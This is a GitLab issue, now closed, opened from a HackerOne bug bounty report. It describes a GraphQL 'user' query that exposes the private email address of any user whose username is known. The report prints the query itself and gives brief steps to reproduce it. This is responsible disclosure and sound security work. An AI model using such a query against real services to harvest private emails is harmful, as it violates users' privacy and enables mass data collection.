Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #244275
Closed
Open
Issue created Sep 02, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

Able to leak private email of any user given his/her username via graphql

HackerOne report #972355 by vaib25vicky on 2020-09-01, assigned to @rchan-gitlab:

Report | How To Reproduce

Report

Summary

Graphql query user is leaking private email of users

query {  
  user(username:"<victim>"){  
    email  
    username  
  }  
}
Steps to reproduce

(Step-by-step guide to reproduce the issue, including:)

  • Have a account with private email settings
  • Use graphql query to access the private email
query {  
  user(username:"<victim>"){  
    email  
    username  
  }  
}
  • Done

Impact

Leaks private emails of users by just knowing their usernames. Attacker can use this bug for mass leakage of gitlab users private emails.

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking